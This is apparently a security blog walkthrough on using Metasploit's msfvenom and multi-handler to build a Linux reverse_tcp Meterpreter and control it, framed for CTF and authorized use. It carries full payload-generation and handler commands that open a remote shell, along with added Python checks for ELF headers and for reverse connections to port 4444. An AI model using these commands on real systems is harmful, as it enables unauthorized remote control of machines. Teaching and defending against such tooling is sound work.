Metasploit has a ton of functionality related to customizing exploits, but many people use it primarily for its post-exploitation command-and-control (C2) capability. Using Metasploit’s Meterpreter can be really useful for anyone playing one of the many CTF virtual machines on VulnHub.com or a CTF at a conference.
In my most recent webinar—where I demonstrated an attack on a Batman Forever-themed single-player capture the flag (CTF) virtual machine—a live attendee asked about the commands I was using to set up Metasploit as a command-and-control (C2) framework. So, that’s the genesis for this blog.
Read on for a step-by-step walkthrough of how to use Metasploit for command and control, so you can use it in your own CTF experiences or authorized hacking.
Setting up Metasploit for command and control
As an attacker, you usually get your initial access either from phishing or by achieving remote code execution on a target system. In short, you’re able to run a command on a target computer.
For more convenience and capability, you install a C2 agent that brings other useful capabilities to allow you to maintain more persistent control, escalate privileges and potentially execute lateral movement throughout a network.
Metasploit’s Meterpreter is the universal classic C2 agent, packaged with a ton of community-contributed tools. Let’s see how it works.
First, we’ll use the msfvenom command to customize a Meterpreter. We’ll build up a single command line over multiple steps. Only the last msfvenom command shown here will be complete.
In my recent demo-heavy Batman-themed CTF webinar, as in most of my talk demos and training classes, I use a Kali Linux system and set the parameters to make an x86-compatible Linux binary that will “phone home,” or connect back to my Metasploit console. This is the “reverse TCP” mode. So, our msfvenom command will need to specify that we want an x86 Linux-compatible Meterpreter using the “reverse_tcp” method for connecting. That all goes into a single parameter, like so:
msfvenom -p linux/x86/meterpreter/reverse_tcp
Is that it? No, since the Meterpreter hasn’t been told what IP address or TCP port it can connect back to. We set these with two parameters, LHOST and LPORT. The “L” denotes our “local” Metasploit console, in contrast to “R” for remote. To make this easy to follow and test yourself, let’s set LHOST to 127.0.0.1, so you can run this test Meterpreter on the same system as your Metasploit console.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444
Here’s a trick: we can leave out LPORT and let it use the default TCP port, 4444.
We need to set two more parameters. The first is “-f” for “file format.” Msfvenom can make files that run on multiple operating systems and can even make scripts instead of binaries. We’ll ask for Linux’s standard binary format, the Executable and Linkable Format (ELF), using “-f elf”.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 -f elf
Finally, we need to tell msfvenom to write this payload to a file, instead of writing it out to the screen. We use the “-o” parameter to specify an output file path, resulting in the actual usable msfvenom command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 -f elf -o meterpreter
After a few seconds, we’ll see that we have a new file called meterpreter.
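Before copying the file anywhere, it is worth checking that msfvenom produced what the command asked for: a 32-bit, little-endian, x86 ELF executable. The following is an added example, not code from the original post or from the Metasploit project; it decodes the ELF header fields that answer that question. The embedded sample bytes are a constructed minimal ELF32 header (not real msfvenom output), and the assumption that the linux/x86 payload is emitted as an ET_EXEC file is labelled in the code.

```python
import struct

# ELF identification constants (from the ELF specification).
ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
EM_386, EM_X86_64 = 3, 62
ET_EXEC, ET_DYN = 2, 3

MACHINE_NAMES = {EM_386: "x86 (i386)", EM_X86_64: "x86-64"}
TYPE_NAMES = {ET_EXEC: "EXEC", ET_DYN: "DYN"}


def parse_elf_header(data: bytes) -> dict:
    """Decode the ELF header fields needed to say what kind of binary this is.

    Returns class (32/64), endianness, e_type, e_machine and the entry point.
    Raises ValueError if the bytes are not an ELF header.
    """
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (ELFCLASS32, ELFCLASS64) or ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        raise ValueError("unsupported ELF class or data encoding")
    endian = "<" if ei_data == ELFDATA2LSB else ">"
    # e_type and e_machine are the two 16-bit fields right after the 16-byte e_ident.
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    # e_entry follows the 4-byte e_version at offset 20; it is 4 bytes in ELF32, 8 in ELF64.
    if ei_class == ELFCLASS32:
        (e_entry,) = struct.unpack(endian + "I", data[24:28])
    else:
        if len(data) < 64:
            raise ValueError("truncated ELF64 header")
        (e_entry,) = struct.unpack(endian + "Q", data[24:32])
    return {
        "class": 32 if ei_class == ELFCLASS32 else 64,
        "endian": "little" if ei_data == ELFDATA2LSB else "big",
        "type": TYPE_NAMES.get(e_type, f"unknown({e_type})"),
        "machine": MACHINE_NAMES.get(e_machine, f"unknown({e_machine})"),
        "entry": e_entry,
    }


def is_x86_linux_elf(data: bytes) -> bool:
    """True when the header is a 32-bit, little-endian, i386 ELF executable.

    Assumption: a linux/x86 payload written with `-f elf` is an ET_EXEC file;
    a shared object (ET_DYN) or a 64-bit file would indicate a different payload choice.
    """
    try:
        h = parse_elf_header(data)
    except ValueError:
        return False
    return (h["class"] == 32 and h["endian"] == "little"
            and h["machine"] == "x86 (i386)" and h["type"] == "EXEC")


# Constructed sample: a minimal 52-byte ELF32 header (not real msfvenom output) with
# e_type=ET_EXEC, e_machine=EM_386 and e_entry=0x08048054.
SAMPLE_ELF32_HEADER = (
    ELF_MAGIC + bytes([ELFCLASS32, ELFDATA2LSB, 1, 0]) + b"\x00" * 8  # e_ident (16 bytes)
    + struct.pack("<HHI", ET_EXEC, EM_386, 1)                          # e_type, e_machine, e_version
    + struct.pack("<III", 0x08048054, 0x34, 0)                         # e_entry, e_phoff, e_shoff
    + struct.pack("<IHHHHHH", 0, 52, 32, 1, 0, 0, 0)                   # e_flags .. e_shstrndx
)

if __name__ == "__main__":
    import sys
    # Usage: python elfcheck.py ./meterpreter  (reads the header of the file msfvenom wrote);
    # with no argument the constructed sample header is checked instead.
    blob = open(sys.argv[1], "rb").read(64) if len(sys.argv) > 1 else SAMPLE_ELF32_HEADER
    print(parse_elf_header(blob))
    print("32-bit x86 ELF executable:", is_x86_linux_elf(blob))
```

Running it against the meterpreter file should report class 32, little-endian and machine x86 (i386); if it reports x86-64 or DYN, the payload or format argument was not the one intended.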
So, we’ve created a Meterpreter that can connect back to a Metasploit console. Now, we need to start up a Metasploit console and tell it to listen for this Meterpreter. First, we run msfconsole at a command line:
msfconsole
Next, we tell it that we’d like to use the generic payload handler, the “multi-handler” module.
use exploit/multi/handler
We need to tell the multi-handler what payload type is connecting back, using the same value we used in our msfvenom command:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
We need to tell the multi-handler what IP address to listen on – this will correspond to the LHOST value we set in our msfvenom command:
set LHOST 127.0.0.1
Finally, we run “exploit” to start this module, passing the “-j” option to make this a background job, allowing us to continue running other commands in Metasploit, if we like.
exploit -j
Let’s test this out by starting another shell or terminal window on the same system so we can run the Meterpreter and see it connect back to us. We start a new window, make the Meterpreter executable and run it.
chmod u+x meterpreter
./meterpreter
If you switch back over to your Metasploit console window, you’ll see that you have a Meterpreter session waiting for you. You can interact with it using the sessions command.
sessions -i 1
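From the defender’s side, the same test is a good moment to look at what the reverse connection leaves on the victim: an established outbound TCP socket from the Meterpreter process to the handler port (4444 by default, as noted above). The following is an added example, not code from the original post or from the Metasploit project; it parses `ss -tnp` style output and flags established sockets whose peer port is a watched handler port. The sample lines are constructed, and the watched-port list and known-good process list are assumptions for the demo.

```python
import re
from dataclasses import dataclass

# Default port that msfvenom/multi-handler use when LPORT is left unset (per the post).
# Extending this to other handler ports is up to the environment; the set is an assumption.
WATCHED_HANDLER_PORTS = {4444}

# Processes that legitimately hold outbound TCP connections on this host (assumption for the demo).
KNOWN_GOOD_PROCESSES = {"sshd", "firefox", "chrome", "apt-get"}

# One data line of `ss -tnp` output. The users:(...) field is optional because ss only
# prints it when it can map the socket to a process (typically when run as root).
SS_LINE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+|\*)"
    r"(?:\s+users:\(\(\"(?P<proc>[^\"]+)\",pid=(?P<pid>\d+),fd=\d+\)\))?"
)


@dataclass
class Finding:
    process: str
    pid: int
    peer: str
    reason: str


def parse_ss_line(line: str):
    """Return the fields of one ss data line, or None for the header or unparseable lines."""
    m = SS_LINE.match(line.strip())
    if not m:
        return None
    return {
        "state": m["state"],
        "laddr": m["laddr"],
        "lport": int(m["lport"]),
        "raddr": m["raddr"],
        "rport": int(m["rport"]) if m["rport"].isdigit() else 0,  # '*' for listeners
        "proc": m["proc"] or "?",
        "pid": int(m["pid"]) if m["pid"] else -1,
    }


def find_reverse_connections(ss_output: str) -> list:
    """Flag established sockets whose peer port is a watched handler port.

    A reverse_tcp stager connects out from the victim, so the telling value is the
    remote (peer) port, not the local one. The handler's own LISTEN socket on 4444
    has peer '*' and is skipped because it is not in the ESTAB state.
    """
    findings = []
    for line in ss_output.splitlines():
        rec = parse_ss_line(line)
        if not rec or rec["state"] != "ESTAB":
            continue
        if rec["rport"] in WATCHED_HANDLER_PORTS and rec["proc"] not in KNOWN_GOOD_PROCESSES:
            findings.append(Finding(rec["proc"], rec["pid"], f'{rec["raddr"]}:{rec["rport"]}',
                                    "outbound connection to a Metasploit handler port"))
    return findings


# Constructed sample in `ss -tnp` layout (not captured from a real system).
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
ESTAB  0      0      10.0.0.5:49822        10.0.0.9:22        users:(("sshd",pid=811,fd=4))
ESTAB  0      0      127.0.0.1:52314       127.0.0.1:4444     users:(("meterpreter",pid=4242,fd=3))
ESTAB  0      0      10.0.0.5:51002        142.250.80.46:443  users:(("firefox",pid=2201,fd=77))
LISTEN 0      128    127.0.0.1:4444        0.0.0.0:*
"""

if __name__ == "__main__":
    # Usage: ss -tnp | python reverse_check.py  (or run with no stdin to use the sample)
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SS_OUTPUT
    for f in find_reverse_connections(data):
        print(f"[!] pid {f.pid} ({f.process}) -> {f.peer}: {f.reason}")
```

On the sample, only the meterpreter process is reported; the sshd and firefox sockets are ignored because their peer ports are not watched, and the handler’s own LISTEN entry is skipped. A port list alone is a weak signal in production (a handler can listen anywhere), so in practice this is combined with process provenance, such as an executable launched from a temporary or home directory.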
To see all the things that Meterpreter can do, use the help command:
help
Take a look at this list! You can upload and download files, set up port forwarders to proxy traffic through the remote system, and even play music on the remote system’s speakers. There are multi-tasking features to make it easier to run multiple programs and even to control multiple systems from one Metasploit console. It’s very useful!
You can use what you’ve just learned to repeat the attack from the webinar, so please go watch the “Linux Attack and Defense: Batman Edition” webinar. There’s a fun and challenging attack path on this one, filled with a riddle and other bits of throwback humor. You can watch the on-demand webinar, then download the virtual machine to try the attack path yourself. Watch my Twitter @jaybeale or Mastodon (@jaybeale@infosec.exchange) feeds for the Batman virtual machine download!
Jay Beale, CEO, CTO at InGuardians, Inc.
Jay Beale is CTO and CEO for InGuardians. He works on Kubernetes, Linux and Cloud-Native security, both as a professional threat actor and an Open Source maintainer and contributor. He's the architect of the open source Peirates attack tool for Kubernetes and Bustakube CTF Kubernetes cluster. Jay helps create and run DEF CON's Kubernetes CTF, is a member of the Kubernetes organization, and previously co-led the Kubernetes project's Security Audit Working Group. Since 2000, he has led training classes on Linux & Kubernetes security at public conferences and in private training.